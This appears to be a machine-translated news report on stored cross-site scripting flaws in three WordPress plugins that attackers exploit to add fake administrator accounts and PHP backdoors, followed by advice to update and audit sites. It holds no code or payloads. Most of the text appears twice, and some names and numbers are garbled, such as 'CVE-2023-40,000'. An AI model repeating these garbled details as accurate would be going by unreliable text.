Cyberbandies massively introduce backdoors into the files of plugins and design themes.
Cybersecurity researchers have warned that several serious vulnerabilities in WordPress plugins are being actively exploited by attackers to create fake admin accounts.
"These vulnerabilities are found in various WordPress plugins and are susceptible to attacks using unauthorized stored cross-site scripts (XSS) due to insufficient input data cleaning and output data escaping, which allows attackers to inject malicious scripts," researchers at Fastly reported.
The vulnerabilities affected by attacks are listed below:
Attack chains that exploit these vulnerabilities include embedding a payload pointing to an encrypted JavaScript file hosted on an external domain. This file creates a new administrator account, inserts a backdoor, and installs tracking scripts.
PHP backdoors are embedded in both plugin files and design theme files, while the tracking script sends an HTTP GET request with host information to the remote server.
WPScan, a WordPress security company, has previously disclosed similar attacks targeting CVE-2023-40,000 to create fake admin accounts on vulnerable sites.
To reduce the risk of such attacks, WordPress site owners are advised to check their installed plugins, update them to the latest versions, and audit their sites for malware or suspicious administrator accounts.
Cybersecurity researchers have warned that several serious vulnerabilities in WordPress plugins are being actively exploited by attackers to create fake admin accounts.
"These vulnerabilities are found in various WordPress plugins and are susceptible to attacks using unauthorized stored cross-site scripts (XSS) due to insufficient input data cleaning and output data escaping, which allows attackers to inject malicious scripts," researchers at Fastly reported.
The vulnerabilities affected by attacks are listed below:
- CVE-2023-6961 (CVSS score: 7.2) - saved cross-site scripts without authentication in WP Meta SE versions prior to 4.5.12.
- CVE-2023-40000 (CVSS score: 8.3) - stored cross-site scripts without authentication in LiteSpeed Cache versions prior to 5.7.
- CVE-2024-2194 (CVSS score: 7.2) - saved cross-site scripts without authentication in WP Statistics versions prior to 14.5.
Attack chains that exploit these vulnerabilities include embedding a payload pointing to an encrypted JavaScript file hosted on an external domain. This file creates a new administrator account, inserts a backdoor, and installs tracking scripts.
PHP backdoors are embedded in both plugin files and design theme files, while the tracking script sends an HTTP GET request with host information to the remote server.
WPScan, a WordPress security company, has previously disclosed similar attacks targeting CVE-2023-40,000 to create fake admin accounts on vulnerable sites.
To reduce the risk of such attacks, WordPress site owners are advised to check their installed plugins, update them to the latest versions, and audit their sites for malware or suspicious administrator accounts.
